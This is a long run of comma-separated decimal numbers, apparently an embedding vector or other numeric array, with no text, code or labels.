-0.041339144110679626, -0.02816479466855526, -0.030796585604548454, -0.007272057235240936, -0.020808087661862373, -0.040508054196834564, -0.01253564190119505, -0.00955756101757288, -0.03195087984204292, -0.012227829545736313, 0.023378318175673485, 0.02085426077246666, -0.001198542769998312, 0.018684186041355133, 0.0034551892895251513, 0.0007358629372902215, -0.018653403967618942, 0.016344815492630005, -0.023963160812854767, -0.010865761898458004, -0.014867317862808704, -0.01848410815000534, -0.03155072405934334, -0.03158150613307953, 0.012181658297777176, 0.044201795011758804, 0.008310922421514988, 0.02399394102394581, -0.020423322916030884, -0.0207157451659441, -0.023932378739118576, 0.00040736989467404783, 0.00024144000781234354, -0.014297865331172943, 0.002449028892442584, 0.020315589383244514, -0.01559837069362402, -0.01215087715536356, 0.01343599148094654, -0.006794949062168598, -0.0011110088089480996, -0.01343599148094654, 0.006140848621726036, 0.004274738486856222, 0.021038947626948357, -0.026964327320456505, 0.04906522482633591, 0.0030915862880647182, 0.011142793111503124, 0.015821535140275955, -0.018514888361096382, -0.013851538300514221, -0.023239802569150925, -0.01928441971540451, 0.007298991084098816, -0.005540615413337946, -0.007210494950413704, 0.04306289181113243, -0.002362456638365984, 0.002685659332200885, -0.007218190468847752, 0.014728802256286144, -0.013836147263646126, -0.021593008190393448, -0.004513292573392391, 0.0010321319568902254, 0.010465606115758419, 0.03555228188633919, -0.03558306023478508, -0.02934986911714077, -0.0064063360914587975, 0.04020024091005325, -0.015159739181399345, -0.009619123302400112, 0.011596815660595894, 0.027410654351115227, 0.019761526957154274, 0.01552911289036274, -0.003047338454052806, -0.0022912751883268356, 0.017422156408429146, 0.03324368968605995, 0.003932297695428133, -0.013220523484051228, -0.004859581124037504, 0.02951916679739952, -0.01806856133043766, -0.015221301466226578, -0.01705278269946575, -0.05722224339842796, -0.03268963098526001, 0.000580514082685113, 0.02604089118540287, -0.01949988678097725, -0.019192075356841087, -0.017037391662597656, 0.0020123205613344908, -0.01723746955394745, 0.011727635748684406, 0.024486441165208817, -0.0035263707395642996, -0.015898486599326134, -0.004063117783516645, 0.0019651870243251324, 0.05903833359479904, -0.01771457865834236, -0.015305949375033379, 0.002483657794073224, -0.004528683610260487, -0.007706841919571161, 0.025563782081007957, 0.025255970656871796, -0.00851100031286478, -0.044232577085494995, 0.026364093646407127, 0.00971146672964096, -0.020761916413903236, 0.004013098310679197, -0.00012913673708681017, 0.029149791225790977, 0.00894963275641203, 0.021423712372779846, 0.0026433351449668407, 0.016406377777457237, 0.02427097223699093, -0.0016708417097106576, 0.007329772226512432, -0.012389430776238441, -0.011081230826675892, -0.029426822438836098, -0.008741859346628189, -0.017560672014951706, -0.012981968931853771, -0.018222467973828316, 0.007733775302767754, 0.006137000862509012, -0.05085053667426109, 0.008318617939949036, -0.008903460577130318, -0.005125069059431553, 0.023070506751537323, 0.009149710647761822, -0.017606843262910843, -0.0037283722776919603, 0.0028049363754689693, -0.02607167325913906, -0.02631792239844799, 0.016283253207802773, 0.014975051395595074, 0.0877264067530632, 0.027841592207551003, -0.004163156729191542, -0.02427097223699093, 0.0006593909347429872, 0.012497165240347385, 0.03232025355100632, 0.0031993205193430185, 0.023070506751537323, 0.006036961916834116, 0.007298991084098816, -0.006979635916650295, -0.027841592207551003, -0.03210478648543358, -0.013551421463489532, 0.004555616993457079, 0.0031512249261140823, -0.011373652145266533, -0.0036013999488204718, 0.01632942445576191, -0.00303771928884089, 0.0262871403247118, 0.0167141892015934, -0.018576450645923615, 0.00040809132042340934, -0.031181350350379944, -0.012905016541481018, -0.012751109898090363, 0.00716432323679328, 0.008272446691989899, 0.007910767570137978, -0.007395182270556688, 0.009295920841395855, 0.009149710647761822, 0.02479425258934498, 0.01267415750771761, -0.0001720620784908533, 0.0035340660251677036, 0.000915740558411926, 0.012012361548841, 0.000625243061222136, -0.013189742341637611, 0.004086203873157501, 0.007071979809552431, -0.0019853871781378984, -0.023732300847768784, 0.02656417153775692, 0.010465606115758419, 0.013720718212425709, 0.0008267636876553297, -0.0025933156721293926, -0.040231022983789444, 0.00769529864192009, 0.02791854366660118, -0.009449826553463936, -0.007329772226512432, -0.012366345152258873, 0.0011071611661463976, -0.000901792838703841, 0.007410572841763496, 0.00971146672964096, -0.00043983443174511194, 0.0024932767264544964, 0.0036013999488204718, 0.01343599148094654, -0.0044786641374230385, -0.004486359190195799, 0.002170074265450239, 0.0010956181213259697, 0.022762693464756012, 0.010534863919019699, 0.0008060825639404356, -0.008087758906185627, 0.009480608627200127, -0.013520640321075916, 0.028749637305736542, -0.020700354129076004, -0.007849205285310745, -0.021700743585824966, -0.013335952535271645, 0.015567589551210403, 0.027010498568415642, -0.008764944970607758, 0.0009806696325540543, -0.013920796103775501, 0.018545670434832573, 0.016621844843029976, 0.010465606115758419, 0.013228219002485275, -0.0035513804759830236, 0.0044440352357923985, 0.013728412799537182, 0.03798399493098259, 0.010188575834035873, -0.00029314280254766345, -0.006371707655489445, 0.01441329438239336, -0.0023374471347779036, -0.0071143037639558315, -0.028380261734128, 0.010327091440558434, -0.0027972410898655653, 0.025810033082962036, 0.014182436279952526, -0.026025500148534775, 0.00356484716758132, -0.0029011275619268417, 0.01124283205717802, 0.0007300914730876684, -0.0026375637389719486, -0.02207011729478836, -0.01691426709294319, 0.003993859980255365, -0.0304579921066761, -0.011666073463857174, -0.020254027098417282, 0.016006221994757652, 0.03524446859955788, 0.018853481858968735, -0.03669118508696556, -0.018915044143795967, -0.0023047421127557755, 0.018638014793395996, -0.012089314870536327, 0.007291295565664768, -0.006367859896272421, -0.016375595703721046, 0.003911135718226433, 0.02454800345003605, 0.015221301466226578, 0.020531058311462402, 0.01081189513206482, 0.015559894032776356, 0.009665295481681824, 0.05826880410313606, -0.000025881454348564148, 0.01507509034126997, 0.01335134357213974, 0.010850371792912483, 0.009665295481681824, -0.013474468141794205, 0.03078119456768036, 0.01028861477971077, 0.012835758738219738, 0.024424878880381584, 0.006829577963799238, 0.020346369594335556, 0.003864963771775365, 0.0024586480576545, 0.008941937237977982, -0.03456728160381317, -0.02642565593123436, 0.008503304794430733, -0.010973496362566948, 0.008534086868166924, 0.019992386922240257, 0.01873035728931427, -0.01859184168279171, -0.01834559254348278, 0.005490595940500498, 0.0010994658805429935, 0.02030019834637642, 0.008480219170451164, 0.010981191881000996, 0.0014467161381617188, 0.018638014793395996, -0.007910767570137978, -0.04764929041266441, -0.02913440205156803, -0.019484497606754303, -0.0016996990889310837, 0.022193241864442825, 0.007887681014835835, -0.020284807309508324, -0.003341683419421315, -0.006333230994641781, -0.025563782081007957, -0.01782231219112873, 0.016067784279584885, 0.0015621456550434232, -0.0018478336278349161, 0.007287447806447744, 0.004447882529348135, 0.012843454256653786, 0.01796082779765129, -0.01591387763619423, -0.005417490378022194, -0.01253564190119505, -0.01253564190119505, -0.0014159349957481027, 0.018991997465491295, 0.02562534436583519, -0.014359427616000175, -0.022931991145014763, -0.00858025811612606, -0.014998137950897217, 0.01187384594231844, -0.00615239143371582, -0.0013976586051285267, -0.002077730605378747, -0.0056868260726332664, 0.0024971244856715202, 0.0016102412482723594, 0.0006310145254246891, 0.014074701815843582, -0.026025500148534775, 0.020038558170199394, 0.0015833077486604452, -0.004878819454461336, -0.00006486896745627746, -0.026548780500888824, 0.013536030426621437, 0.018160905689001083, 0.020392542704939842, 0.005217412486672401, -0.013220523484051228, 0.003732220036908984, -0.029365260154008865, -0.008257055655121803, 0.009857677854597569, -0.025440657511353493, -0.007152780424803495, 0.011527557857334614, -0.0029453756287693977, -0.028595730662345886, -0.0032512638717889786, 0.061285361647605896, -0.011465995572507381, -0.021315976977348328, 0.010457911528646946, 0.012143181636929512, 0.002166226739063859, 0.02659495361149311, 0.014197826385498047, -0.00004403755156090483, -0.002808784134685993, 0.013751499354839325, -0.03039642982184887, 0.02046949416399002, -0.02656417153775692, -0.0074798306450247765, 0.0022585701663047075, -0.004544074181467295, -0.025255970656871796, -0.01702200062572956, -0.00021967673092149198, 0.0158369243144989, 0.015552199445664883, 0.0002986737817991525, 0.0017670330125838518, -0.0038361065089702606, 0.019592231139540672, 0.00540594756603241, -0.01180458813905716, -0.0017458709189668298, 0.014143959619104862, 0.0029242136515676975, -0.009072757326066494, 0.03250494226813316, -0.019715355709195137, 0.00903428066521883, -0.01848410815000534, -0.023793864995241165, 0.01095041073858738, -0.010557950474321842, 0.026225578039884567, -0.0292421355843544, 0.009957716800272465, -0.010388653725385666, 0.006629500072449446, -0.0052328030578792095, 0.027056671679019928, 0.0032243302557617426, -0.007506764028221369, -0.013374429196119308, 0.006456355564296246, 0.005848427303135395, 0.004378625191748142, -0.03555228188633919, -0.005559853278100491, -0.008026196621358395, 0.04410945251584053, -0.016929658129811287, -0.03776852786540985, -0.024363316595554352, 0.010850371792912483, -0.005629111081361771, -0.012789586558938026, 0.006879596970975399, -0.029996275901794434, 0.00744904950261116, 0.01051177829504013, 0.023901598528027534, -0.013020445592701435, 0.02736448310315609, -0.014890403486788273, -0.0035225229803472757, 0.03219712898135185, 0.002400933299213648, -0.02534831501543522, 0.019038168713450432, -0.0010706085013225675, 0.005452119279652834, 0.015821535140275955, -0.019068950787186623, 0.022824255749583244, 0.003924602642655373, -0.0026260206941515207, -0.0010956181213259697, -0.005909989587962627, 0.03136603906750679, -0.021469883620738983, -0.019669184461236, -0.029503775760531425, 0.008572562597692013, 0.026025500148534775, -0.020623400807380676, 0.004636417608708143, 0.0035148276947438717, -0.02785698138177395, 0.04035414755344391, 0.01859184168279171, 0.008072368800640106, -0.00821857899427414, -0.012989664450287819, -0.008180102333426476, -0.0035071324091404676, 0.004574855323880911, -0.013274390250444412, 0.005986942443996668, 0.019022779539227486, 0.0010657989187166095, 0.018222467973828316, 0.007652974687516689, -0.011796893551945686, 0.004190090112388134, -0.0003544646897353232, 0.036814309656620026, -0.014882707968354225, -0.0341055653989315, -0.007248971611261368, 0.015852315351366997, -0.02207011729478836, -0.006190868094563484, -0.0016352509846910834, 0.005344385281205177, 0.021562227979302406, 0.02868807502090931, -0.015036613680422306, 0.0073720961809158325, 0.002420171396806836, 0.012943492271006107, 0.002447105012834072, 0.013174351304769516, 0.00421317620202899, 0.03164307028055191, 0.005121221300214529, 0.016375595703721046, 0.001541945501230657, -0.010927324183285236, -0.03826102614402771, 0.009072757326066494, -0.007399030029773712, -0.021192852407693863, -0.007387486752122641, 0.028380261734128, -0.008172407746315002, -0.01103505864739418, -0.009703772142529488, 0.01789926551282406, -0.007856899872422218, 0.0074605923146009445, -0.024024723097682, -0.0010119318030774593, -0.001258181408047676, 0.005648349411785603, 0.03487509489059448, 0.001471725874580443, -0.013182046823203564, 0.023978551849722862, 0.019161293283104897, 0.0009484455804340541, -0.003051185980439186, -0.006248582620173693, -0.030796585604548454, 0.00035518614458851516, 0.01021935697644949, 0.00045233929995447397, -0.004944229498505592, 0.004671046510338783, 0.0146210677921772, -0.0003686529234983027, -0.008526391349732876, 0.01994621381163597, 0.01594465970993042, -0.01699122041463852, 0.0017324041109532118, 0.0005718569154851139, -0.026441046968102455, 0.0042016333900392056, 0.023701520636677742, 0.009326701983809471, -0.015475246123969555, 0.016421766951680183, 0.02040793187916279, 0.003966926597058773, 0.004305519629269838, 0.002062340034171939, 0.015790753066539764, -0.0016843085177242756, 0.006929616443812847, 0.012774196453392506, 0.011250526644289494, 0.006741081830114126, 0.007295143324881792, 0.001225476386025548, -0.020254027098417282, -0.019746137782931328, -0.0037302961573004723, 0.014128568582236767, -0.007418267894536257, 0.012004666030406952, -0.011427518911659718, 0.0023105135187506676, -0.002125826198607683, 0.005178936291486025, 0.014490247704088688, -0.025856204330921173, 0.0015371359186246991, 0.02962690033018589, -0.016021613031625748, 0.03819946199655533, 0.005490595940500498, 0.01605239324271679, -0.00924205407500267, -0.02607167325913906, 0.009950021281838417, 0.012527946382761002, -0.0023586091119796038, -0.01577536202967167, 0.01646794006228447, 0.00010821514297276735, -0.010157794691622257, 0.007329772226512432, 0.01408239733427763, -0.014882707968354225, -0.018853481858968735, 0.010834980756044388, -0.014821145683526993, -0.0035032848827540874, 0.017776140943169594, -0.007087370380759239, -0.011527557857334614, -0.005121221300214529, 0.0028992039151489735, -0.0035436851903796196, 0.005390556994825602, -0.0038091728929430246, -0.010642598383128643, -0.01366685051470995, -0.0022970468271523714, -0.007071979809552431, 0.011927713640034199, -0.016760360449552536, 0.021854648366570473, 0.010911934077739716, -0.006691062357276678, -0.021331368014216423, 0.008018501102924347, -0.015159739181399345, 0.012774196453392506, -0.011504472233355045, 0.015452160499989986, 0.004774932749569416, -0.004536378663033247, 0.003963078837841749, -0.00994232576340437, -0.0006329383468255401, 0.013158961199223995, 0.015167433768510818, 0.013689937070012093, -0.0038553448393940926, -0.002443257486447692, 0.015713799744844437, -0.010657988488674164, 0.039492275565862656, 0.011442909017205238, 0.028811199590563774, -0.0037206769920885563, 0.011289003305137157, -0.011750721372663975, -0.005532919894903898, -0.006487137172371149, 0.01914590410888195, 0.002348989946767688, 0.018776528537273407, -0.002760688541457057, 0.017006609588861465, 0.032566506415605545, -0.004451730288565159, -0.01762223429977894, -0.007214342709630728, 0.007941548712551594, -0.0015890792710706592, 0.01657567359507084, -0.003337835893034935, -0.033089786767959595, 0.00608313363045454, 0.026087062433362007, -0.02430175431072712, 0.007722232490777969, -0.0058907512575387955, 0.008103149943053722, 0.018407154828310013, -0.0025740775745362043, -0.006329383235424757, -0.013089703395962715, 0.019823089241981506, -0.009095842950046062, -0.0009546980145387352, 0.019869262352585793, 0.00849561020731926, 0.008903460577130318, -0.007541392929852009, 0.004859581124037504, -0.0025317533873021603, -0.029826978221535683, 0.010157794691622257, -0.009349788539111614, -0.002683735452592373, 0.0053405375219881535, 0.011412127874791622, -0.007298991084098816, -0.019130513072013855, 0.020792696624994278, 0.013713022693991661, -0.010788808576762676, -0.014251693151891232, 0.013605288229882717, -0.019269028678536415, 0.020177073776721954, 0.00370721030049026, -0.0023047421127557755, -0.004547921475023031, 0.002400933299213648, -0.02099277451634407, 0.01071955170482397, -0.02294738031923771, -0.0025509914848953485, 0.014782669022679329, -0.011527557857334614, -0.007856899872422218, -0.0017016229685395956, -0.0005045230500400066, -0.0040977466851472855, 0.020900432020425797, -0.013612983748316765, 0.017806921154260635, -0.022131679579615593, -0.0003987126692663878, -0.006160086952149868, 0.009926935657858849, 0.01831481046974659, 0.011758416891098022, 0.008003110997378826, 0.005898446775972843, -0.01521360594779253, -0.004840342793613672, 0.006825730204582214, 0.0020084730349481106, -0.011196659877896309, 0.007956938818097115, -0.031242912635207176, -0.006691062357276678, 0.010411739349365234, -0.014205521903932095, 0.011265917681157589, -0.017745358869433403, 0.005348232574760914, -0.010034670121967793, 0.010173184797167778, -0.009188187308609486, -0.015113567002117634, -0.019823089241981506, 0.009819201193749905, -0.02374769188463688, 0.024840423837304115, 0.0016323652816936374, -0.018222467973828316, -0.0008325351518578827, 0.01699122041463852, -0.004447882529348135, -0.009988497942686081, -0.016560282558202744, 0.006125458050519228, 0.0021912362426519394, 0.009434436447918415, 0.013097398914396763, 0.010773418471217155, 0.003682200564071536, -0.002693354617804289, 0.01928441971540451, -0.008687992580235004, -0.0020661877933889627, 0.006579480599611998, 0.001232209731824696, 0.037060558795928955, -0.01425938867032528, -0.015960050746798515, -0.02082347869873047, 0.01611395552754402, -0.008464829064905643, 0.0035340660251677036, -0.007306686136871576, 0.01765301637351513, 0.014774973504245281, 0.010657988488674164, -0.005005791783332825, -0.001207199995405972, -0.009788420051336288, 0.00903428066521883, 0.002412476111203432, -0.005186631344258785, 0.009142015129327774, 0.0073105338960886, 0.01162759680300951, 0.004343996290117502, -0.0077530136331915855, 0.015821535140275955, -0.013836147263646126, 0.01222013495862484, 0.012651070952415466, 0.015344426035881042, -0.006506375037133694, -0.0052866702899336815, 0.016375595703721046, -0.020561838522553444, 0.021700743585824966, 0.00024865433806553483, -0.004120832774788141, -0.008687992580235004, -0.03742993250489235, 0.015167433768510818, 0.012343259528279305, -0.012781891040503979, -0.00837248470634222, 0.0025875442661345005, -0.0037399153225123882, 0.008480219170451164, 0.006410183850675821, 0.0018738053040578961, 0.006998874247074127, 0.0022297129034996033, 0.02005394920706749, -0.012435602955520153, -0.02447105012834072, -0.0044247969053685665, -0.017206687480211258, -0.0011456375941634178, 0.012258610688149929, -0.001501545193605125, 0.009495998732745647, -0.002135445363819599, 0.010134709067642689, 0.01809934340417385, -0.0034551892895251513, -0.002958842320367694, 0.006629500072449446, 0.00814932119101286, 0.01176611240953207, 0.004801866598427296, 0.009503694251179695, 0.008026196621358395, -0.0074952212162315845, 0.0016737275291234255, 0.01164298690855503, -0.000300116662401706, 0.0031358343549072742, -0.01605239324271679, -0.013536030426621437, 0.002443257486447692, 0.00787613820284605, 0.0031493010465055704, -0.0005401137750595808, -0.011635292321443558, -0.01035787258297205, -0.00727590499445796, -0.006621804554015398, 0.025533001869916916, -0.00849561020731926, 0.009026585146784782, -0.027518387883901596, 0.0010629130993038416, 0.008172407746315002, 0.012274001725018024, -0.03610634058713913, 0.0038534209597855806, 0.025425268337130547, -0.0050288778729736805, 0.01015009917318821, 0.005521377082914114, -0.007106608711183071, 0.017037391662597656, 0.004482511430978775, -0.017114344984292984, 0.02033098042011261, 0.011666073463857174, 0.01067337952554226, 0.0048057143576443195, -0.013628373853862286, 0.003078119596466422, -0.027933934703469276, 0.01925363764166832, 0.010003888979554176, 0.006387098226696253, 0.022054726257920265, -0.016067784279584885, -0.01296657882630825, 0.004636417608708143, -0.005094287917017937, 0.0044247969053685665, 0.02440948784351349, 0.002364380517974496, -0.015867706388235092, 0.005386709235608578, -0.00851100031286478, 0.004328605718910694, -0.007926157675683498, 0.0034551892895251513, 0.013428296893835068, 0.025363704189658165, -0.002764536067843437, 0.025948548689484596, 0.009549865499138832, -0.00003324609497212805, 0.005044268444180489, 0.0046479604206979275, -0.025717688724398613, 0.0032377969473600388, 0.010927324183285236, 0.020915823057293892, 0.017345203086733818, 0.006837273016571999, -0.002231636783108115, -0.02502511255443096, -0.000893135613296181, -5.673779810422275e-7, 0.014436380937695503, -0.02287042886018753, 0.03108900785446167, -0.007668365258723497, 0.021331368014216423, 0.015436769463121891, 0.016929658129811287, -0.02113129012286663, 0.008434047922492027, -0.007587564643472433, -0.0008407114073634148, 0.011396737769246101, -0.02234714850783348, 0.019484497606754303, 0.015321340411901474, 0.009880763478577137, 0.002189312595874071, 0.026795031502842903, 0.010858066380023956, 0.005171240773051977, -0.015513722784817219, 0.0034397984854876995, -0.014644153416156769, -0.010134709067642689, 0.006848815828561783, -0.0020219397265464067, 0.011119706556200981, 0.02607167325913906, -0.021946992725133896, -0.003911135718226433, -0.0068411207757890224, -0.00653715617954731, 0.027564560994505882, 0.0028280222322791815, -0.006848815828561783, 0.010365567170083523, 0.01625247113406658, -0.0018959292210638523, -0.012389430776238441, -0.0003270501911174506, 0.008334008976817131, -0.003914983477443457, -0.030334867537021637, 0.005044268444180489, -0.026656515896320343, -0.0036013999488204718, -0.0006666052504442632, -0.011927713640034199, -0.009188187308609486, -0.003978469409048557, 0.006340926047414541, -0.005128916818648577, 0.008749554865062237, -0.0005353042506612837, -0.000150058331200853, -0.011589120142161846, 0.01663723587989807, 0.010380958206951618, 0.019161293283104897, -0.0074798306450247765, 0.015898486599326134, 0.012027752585709095, 0.012735719792544842, -0.018407154828310013, 0.02074652537703514, -0.03244338184595108, -0.001499621313996613, 0.00894963275641203, 0.007048893719911575, -0.0010253986110910773, -0.005709911696612835, 0.01336673367768526, 0.019653793424367905, -0.0004879300540778786, -0.02259339764714241, 0.01889965310692787, -0.0008238779264502227, 0.004544074181467295, -0.0011302470229566097, 0.010519473813474178, -0.02413245663046837, 0.005094287917017937, -0.016206299886107445, -0.017883874475955963, 0.0037129817064851522, 0.008072368800640106, -0.01685270480811596, -0.0077376230619847775, 0.0023355232551693916, -0.0016506415558978915, 0.0032474161125719547, -0.010657988488674164, 0.007225885521620512, -0.0014900022652000189, 0.009134319610893726, 0.03567540645599365, 0.017976218834519386, 0.007037350907921791, -0.0025028958916664124, 0.0022123984526842833, -0.007137389853596687, 0.006514070555567741, -0.0012591432314366102, 0.0037860870361328125, -0.0109658008441329, 0.025810033082962036, 0.004948077257722616, 0.017560672014951706, 0.0016910419799387455, 0.0008334970334544778, -0.020669572055339813, -0.007949243299663067, -0.00032272160751745105, 0.017806921154260635, 0.0065640900284051895, -0.005717607215046883, -0.005652197171002626, -0.00798771996051073, 0.02781081013381481, -0.025148237124085426, -0.0022758846171200275, -0.017637625336647034, 0.01328208576887846, -0.013866928406059742, -0.005417490378022194, 0.032258693128824234, 0.005094287917017937, -0.003260882804170251, -0.017068173736333847, -0.007837661541998386, 0.002020015846937895, -0.009334397502243519, -0.022578006610274315, 0.014921184629201889, 0.011612205766141415, -0.010858066380023956, -0.009826896712183952, 0.0005324184894561768, 0.004455578047782183, -0.004286281298846006, -0.007849205285310745, -0.007995415478944778, -0.012189353816211224, -0.041831646114587784, 0.0000538069725735113, -0.0010985039407387376, 0.03367462754249573, 0.004836495500057936, 0.017560672014951706, -0.008295532315969467, -0.009596037678420544, -0.0025048197712749243, 0.026687296107411385, -0.0015611837152391672, -0.023162849247455597, -0.016560282558202744, 0.008457133546471596, 0.011650682426989079, 0.0025798489805310965, 0.006325535476207733, -0.020484885200858116, 0.021916210651397705, -0.003990012686699629, 0.017729967832565308, 0.015821535140275955, -0.007660670205950737, 0.008687992580235004, 0.013951577246189117, 0.008626430295407772, -0.015629151836037636, -0.001492887968197465, -0.01482884120196104, 0.0049596200697124004, 0.011566034518182278, 0.003012709552422166, 0.007322076708078384, 0.014582591131329536, 0.0000676945855957456, -0.011065839789807796, 0.0011331327259540558, 0.013828451745212078, 0.006063895300030708, -0.019376762211322784, -0.020900432020425797, 0.007583716884255409, 0.004790323320776224, 0.01058103609830141, -0.03502900153398514, -0.004136223345994949, -0.021331368014216423, -0.009065061807632446, -0.033582285046577454, -0.005986942443996668, 0.010157794691622257, -0.008957328274846077, 0.013866928406059742, -0.007272057235240936, -0.00425550015643239, -0.0034994371235370636, 0.0019988538697361946, -0.005809950642287731, 0.01726824976503849, -0.008795727044343948, 0.005609872750937939, -0.02554839290678501, -0.01253564190119505, -0.007841509766876698, -0.022685740143060684, -0.016375595703721046, -0.011158183217048645, 0.004801866598427296, 0.017776140943169594, -0.01028861477971077, -0.015744581818580627, -0.018776528537273407, -0.0022951229475438595, 0.028626510873436928, 0.01969996467232704, 0.011258222162723541, 0.014713411219418049, -0.01148908119648695, -0.013166656717658043, 0.015759972855448723, 0.004055422730743885, -0.01643715798854828, 0.00903428066521883, -0.005101982969790697, 0.013720718212425709, 0.02673346735537052, 0.005690673366189003, 0.012427907437086105, 0.016344815492630005, -0.005059659015387297, -0.007652974687516689, 0.02328597381711006, -0.010842676274478436, -0.019438324496150017, -0.002433638321235776, 0.0010600273963063955, -0.022624177858233452, -0.01939215324819088, 0.010280919261276722, 0.002926137298345566, -0.024178629741072655, -0.030611898750066757, 0.029565338045358658, -0.001501545193605125, 0.03327447175979614, -0.015713799744844437, 0.01608317531645298, -0.015759972855448723, 0.013320562429726124, -0.003412865102291107, -0.00432475795969367, -0.006063895300030708, -0.014867317862808704, 0.01762223429977894, -0.0058907512575387955, 0.0032397208269685507, -0.008003110997378826, 0.008410961367189884, -0.013289781287312508, -0.004821104928851128, -0.0024855814408510923, 0.0052674319595098495, 0.004470968618988991, 0.001789156929589808, 0.02294738031923771, -0.013220523484051228, -0.028811199590563774, 0.0022027792874723673, 0.007141237147152424, 0.013228219002485275, 0.0032993594650179148, 0.013120484538376331, 0.005105830729007721, 0.013235914520919323, -0.02816479466855526, -0.011365956626832485, -0.008695688098669052, 0.0009542170446366072, -0.00041843188228085637, -0.004651808179914951, 0.01128130778670311, -0.007033503148704767, -0.008118540048599243, 0.007733775302767754, 0.016175517812371254, 0.018653403967618942, -0.001215857220813632, 0.016129346564412117, -0.00969607662409544, 0.0005367471021600068, -0.024040114134550095, -0.019330590963363647, -0.0019430629909038544, 0.011904627084732056, 0.020423322916030884, -0.011265917681157589, -0.014090091921389103, -0.00990385003387928, -0.013166656717658043, 0.004532530903816223, 0.0005728187970817089, 0.006460203323513269, -0.0074605923146009445, -0.011296698823571205, 0.0030896624084562063, 0.008903460577130318, 0.011689159087836742, 0.00090852624271065, -0.013828451745212078, 0.015613761730492115, -0.019345982000231743, -0.02110050991177559, -0.0032743497285991907, 0.012012361548841, 0.028210965916514397, -0.00304156681522727, -0.03321291133761406, 0.013343648053705692, -0.02391698956489563, 0.004270890727639198, 0.026825811713933945, 0.0038418779149651527, 0.004609484225511551, 0.006360164377838373, 0.002706821309402585, 0.018807310611009598, -0.006548699457198381, -0.007864595390856266, 0.01475958339869976, -0.005602177698165178, 0.003087738761678338, 0.0015986983198672533, 0.022993553429841995, -0.0005377089837566018, 0.010165490210056305, 0.015552199445664883, 0.004571007564663887, -1.4278386117894115e-7, 0.016529502347111702, 0.0044247969053685665, 0.001471725874580443, 0.015929268673062325, 0.003614866640418768, 0.0009316120995208621, 0.010842676274478436, -0.0025721536949276924, -0.003343607299029827, 0.0008498495444655418, -0.020238636061549187, -0.018607232719659805, 0.009226663038134575, -0.0022374081891030073, 0.010750332847237587, 0.005929227918386459, 0.008264751173555851, 0.025040501728653908, -0.012697243131697178, 0.012712634168565273, -0.013443686999380589, -0.0031704630237072706, 0.011750721372663975, 0.015690714120864868, -0.006402488797903061, -0.011566034518182278, 0.0063062976114451885, 0.021392930299043655, -0.020761916413903236, -0.0007632774650119245, -0.008487914688885212, 0.0022912751883268356, -0.009596037678420544, 0.0028337938711047173, 0.032566506415605545, 0.01343599148094654, 0.004401710815727711, -0.0012639528140425682, -0.009126624092459679, 0.006775710731744766, 0.021531445905566216, -0.004501749761402607, 0.0013389820232987404, -0.013543725945055485, 0.0010080841602757573, 0.01803778111934662, -0.0006531385006383061, 0.009303616359829903, -0.028103232383728027, -0.003447494003921747, -0.0007243200088851154, -0.00011074016219936311, -0.016483331099152565, 0.001804547617211938, -0.011042754165828228, -0.020777307450771332, 0.014959661290049553, -0.013158961199223995, 0.0009758601081557572, 0.0015958126168698072, 0.019469106569886208, 0.02322441153228283, -0.017283640801906586, 0.003056957386434078, 0.016806533560156822, -0.007749165873974562, 0.019792309030890465, -0.005756083410233259, -0.0060061807744205, -0.0013716870453208685, -0.006052352488040924, 0.000009138167115452234, -0.017776140943169594, -0.012643376365303993, -0.008341703563928604, -0.006648738402873278, 0.010211661458015442, -0.010804199613630772, -0.0002808784192893654, 0.007437506224960089, -0.014528724364936352, -0.00000939367510000011, 0.009195881895720959, 0.005917684640735388, -0.02719518542289734, 0.032043226063251495, -0.0008253207779489458, 0.012066228315234184, 0.003085814882069826, -0.011335175484418869, -0.02046949416399002, 0.008703382685780525, 0.009049671702086926, -0.010834980756044388, -0.002139293123036623, -0.03018096275627613, -0.0047710854560136795, -0.006929616443812847, 0.0013264771550893784, -0.0032493399921804667, -0.008795727044343948, 0.014613372273743153, -0.011196659877896309, 0.011843064799904823, 0.0026183254085481167, 0.003986164927482605, 0.003928449936211109, -0.005540615413337946, 0.007225885521620512, 0.0014948118478059769, 0.0044440352357923985, -0.0010571416933089495, 0.0011129325721412897, 0.00941904541105032, -0.007768404204398394, -0.010834980756044388, -0.0013909252593293786, 0.0008363827946595848, 0.002649106550961733, -0.008749554865062237, 0.03155072405934334, -0.003370540915057063, -0.008226274512708187, -0.0035494565963745117, -0.0034109412226825953, 0.01169685460627079, 0.0017756902379915118, 0.005213565193116665, 0.008911156095564365, 0.016729580238461494, 0.008257055655121803, -0.010788808576762676, -0.009873068891465664, -0.02234714850783348, 0.0010773418471217155, 0.009157405234873295, 0.008972718380391598, -0.0010427129454910755, -0.03930758684873581, 0.0158369243144989, -0.0037860870361328125, 0.026856593787670135, -0.013866928406059742, 0.011758416891098022, 0.007826118730008602, -0.006664128974080086, 0.009680685587227345, -0.004590245895087719, 0.0003895745030604303, 0.020238636061549187, 0.014721106737852097, 0.017252860590815544, -0.007552935741841793, -0.029611509293317795, -0.0013851538533344865, -0.008487914688885212, -0.004809561651200056, 0.021254414692521095, -0.013866928406059742, -0.030242525041103363, 0.00730283884331584, -0.01723746955394745, 0.007856899872422218, 0.018407154828310013, -0.002735678805038333, -0.015159739181399345, -0.005886903498321772, 0.0208850409835577, -0.004363234620541334, 0.000905159511603415, -0.01889965310692787, 0.007641431875526905, -0.006044657435268164, 0.015467550605535507, 0.012297087348997593, -0.009057367220520973, -0.02283964678645134, -0.012543337419629097, 0.002631792100146413, 0.0005665663629770279, -0.012712634168565273, -0.01928441971540451, 0.011681463569402695, 0.022531835362315178, -0.0048057143576443195, -0.005359775852411985, 0.0013235914520919323, 0.0031319865956902504, 0.020931212231516838, 0.005540615413337946, -0.010388653725385666, -0.009272835217416286, 0.005117373540997505, 0.0008315732120536268, 0.008618734776973724, -0.010173184797167778, 0.008434047922492027, -0.010519473813474178, 0.0059600090608000755, -0.02165457047522068, 0.0011379423085600138, 0.00031719059916213155, -0.002071959199383855, 0.0025952395517379045, -0.006383250467479229, 0.011227441020309925, 0.0109658008441329, 0.010365567170083523, 0.0013813060941174626, -0.017837703227996826, 0.008888070471584797, -0.005756083410233259, -0.016390986740589142, -0.0011889237212017179, -0.013066617771983147, -0.013158961199223995, 0.018545670434832573, 0.008572562597692013, -0.013982358388602734, 0.021315976977348328, 0.0034705798607319593, 0.0023239802103489637, 0.008249360136687756, 0.014490247704088688, -0.009973106905817986, 0.012474079616367817, 0.0006622766377404332, -0.009734553284943104, 0.01065029390156269, 0.02468651905655861, 0.014320950955152512, -0.005540615413337946, 0.010434824973344803, -0.03144299238920212, 0.00242401915602386, -0.01771457865834236, 